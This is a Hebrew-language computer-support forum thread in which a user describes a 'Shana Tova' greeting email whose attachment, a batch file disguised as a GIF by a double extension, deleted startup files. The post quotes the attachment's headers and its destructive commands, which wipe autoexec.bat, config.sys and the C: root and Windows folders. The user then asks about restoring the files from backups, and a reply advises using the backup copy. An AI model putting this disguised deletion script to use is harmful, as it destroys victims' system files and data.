וירוס "שנה טובה"

קיבלתי "שנה טובה" בצורת קובץ מצורף בשם shanatova.gif המכיל וירוס שמוחק את קבצי האתחול AUTOEXEC.BAT ו-CONFIG.SYS. תוכן הקובץ: Content-Type: application/octet-stream; name="shana tova.gif .bat" Content-Transfer-Encoding: 7bit Content-Disposition: attachment; filename="shana tova.gif .bat" echo on cd c: del c:\autoexec.bat del c:\config.sys del c:\*.* del c:\windows\*.* אני "אכלתי אותה" ופתחתי את הקובץ... ואכן, הקבצים AUTOEXEC.BAT ו-CONFIG.SYS נמחקו מה-ROOT DIRECTORY של הדיסק. מצאתי קבצים בשם הנ"ל ב-C:\WINDOWS\COMMAND\EBD והעתקתי אותם ל-C:\. האם זה יעזור? אני מפחד שאני לא אוכל לאתחל את המחשב... מישהו מכיר את הוירוס הזה? מה אפשר לעשות?

ועוד משהו...

בקובץ AUTOEXEC.BAT שמצאתי ב-EBD יש: @ECHO OFF set EXPAND=YES SET DIRCMD=/O:N set LglDrv=27 * 26 Z 25 Y 24 X 23 W 22 V 21 U 20 T 19 S 18 R 17 Q 16 P 15 set LglDrv=%LglDrv% O 14 N 13 M 12 L 11 K 10 J 9 I 8 H 7 G 6 F 5 E 4 D 3 C cls call setramd.bat %LglDrv% set temp=c:\ set tmp=c:\ path=%RAMD%:\;a:\;%CDROM%:\ copy command.com %RAMD%:\ > NUL set comspec=%RAMD%:\command.com copy extract.exe %RAMD%:\ > NUL copy readme.txt %RAMD%:\ > NUL :ERROR IF EXIST ebd.cab GOTO EXT echo Please insert Windows 98 Startup Disk 2 echo. pause GOTO ERROR :EXT %RAMD%:\extract /y /e /l %RAMD%: ebd.cab > NUL echo The diagnostic tools were successfully loaded to drive %RAMD%. echo. IF "%config%"=="NOCD" GOTO QUIT IF "%config%"=="HELP" GOTO HELP LH %ramd%:\MSCDEX.EXE /D:mscd001 /L:%CDROM% echo. GOTO QUIT :HELP cls call help.bat echo Your computer will now restart and the startup menu will appear. echo. echo. echo. echo. echo. echo. echo. echo. echo. echo. restart.com GOTO QUIT :QUIT echo To get help, type HELP and press ENTER. echo. rem clean up environment variables set CDROM= set LglDrv= יש לי ב-C:\ קובץ בשם AUTOEXEC.001 שיכול להיות עותק של AUTOEXEC.BAT המקורי... הוא נוצר בתאריך של התקנת WINDOWS, והקובץ למעלה הוא משנת 98... התוכן של ה-001 הוא: @ECHO OFF if not exist %winbootdir%\system\vmm32.o20 copy %winbootdir%\system\vmm32.vxd %winbootdir%\system\vmm32.o20 cd %winbootdir%\system devlib -u vmm32.vxd rplcldr %winbootdir%\system\vmm32\vmm.vxd %winbootdir%\system\vmm32.vxd devlib -p vmm32.vxd mode con codepage prepare=((862) C:\WINDOWS\COMMAND\hebega.cpi) mode con codepage select=862 האם אכן זה הקובץ הנכון? האם להעתיק אותו במקום הקובץ הקיים (זה שלמעלה)? האם אפשר לעשות את זה ב-WINDOWS?

בהחלט כן

הקובץ השני שמסתיים ב 001 הוא גיבוי לקודם . תבדוק ותראה שיש לך גם אחד שנגמר בסיומת BAK תשתמש בו. אם הוירוס הפשוט הזה עשו ילדים קטנים אין לך שום בעיה רק תבקש מחבר את ה CONFIG.SYS .
עבור לעמוד
בחזרה לפורום
כרגע בפורום זה: אין משתמשים רשומים
עבור לפורום:
תמיכה - מחשבים ואינטרנט
בחר
בחר